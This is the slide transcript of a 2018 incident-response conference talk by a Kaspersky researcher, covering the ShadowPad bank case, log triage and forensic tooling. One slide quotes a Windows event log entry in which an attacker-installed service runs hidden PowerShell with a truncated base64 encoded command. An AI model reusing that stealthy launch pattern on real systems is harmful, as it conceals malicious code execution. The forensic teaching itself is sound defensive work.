Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=47 DC7499
February 10, 2018

Sergey Golovanov - Indecent Response 2018

0c988f4618b436b14ce6ddcecd52d11d?s=128

DC7499

February 10, 2018
Tweet

Transcript

  1. Indecent response 2018 Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky

    Lab
  2. Challenge: find a SDC bus speed

  3. None
  4. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  5. 1.Shadowpad

  6. Case overview: 1.Antifraud system in a bank is detecting printing

    of a lot of elite cards for the last several hours 2.Bank is starting network audit 3.Bank is discovering suspicion DNS requests 4.Forensics can not find malware on PCs 5.Bank asks for help…
  7. DNS requests

  8. None
  9. None
  10. “Our worldwide customers range from small businesses right up to

    global Fortune 500 companies.” NetSarang AmericanExpress BankofAmericaCorp. BankofChina BNPParibas Citigroup DeutscheBank Fortis GeneralElectric INGGroup MerrillLynch MorganStanley ShinhanFinancialGroup SocieteGenerale UBS https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru
  11. https://securelist.com/shadowpad -in-corporate-networks/81432/

  12. What was done?

  13. AutoMA – static analysis framework

  14. Shadowpad after autoMA

  15. Miniduke after autoMA

  16. 2.0x403AA91EE

  17. Case overview:

  18. None
  19. None
  20. How to find suspicion DNS requests? sort | uniq -c

    | sort -rn
  21. How to find suspicion powershell? sort | uniq -c |

    sort -rn
  22. parse_evtx.exe System.evtx | findstr /i "power" | more Record #2396788

    2027.02.22-08:03:00 'Computer':PC1', 'Channel':'System', 'EventSourceName':'Service Control Manager', 'Guid':‘GUID'Name':'Service Control Manager', 'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04, 'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the system.), 'Qualifiers':16384, 'Keywords':8080000000000000, 'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692, 'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID, 'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A FMAdAByAGUAYQBtACgA
  23. https://github.com/KasperskyLab/ForensicsTools/

  24. 3.Scanner2

  25. Case overview: 1. No money 2. No logs 3. No

    team 4. No idea about network 5. CISO!
  26. What to do? we need logs we need mfts we

    need regs
  27. WE NEED TO RECOMPILE EVERYTHING!

  28. Awesome batch file

  29. How to find something suspicion ? sort | uniq -c

    | sort -rn
  30. https://cdn.securelist.com/files/ 2017/12/HappyNewYear.zip

  31. 4. PLANS

  32. 1. MFT is a hell. Sleuthkit is not enough. We

    need more data about deleted files. 2. USN J is required with no HDD touch. 3. Reg analysis is needed with unallocated part.
  33. Agenda 1.Shadowpad 2.0x403AA91EE 4.Plans 3.Scanner2

  34. Зачем?

  35. None
  36. Thank you! Sergey @k1k_ Golovanov Principal Security Researcher Kaspersky Lab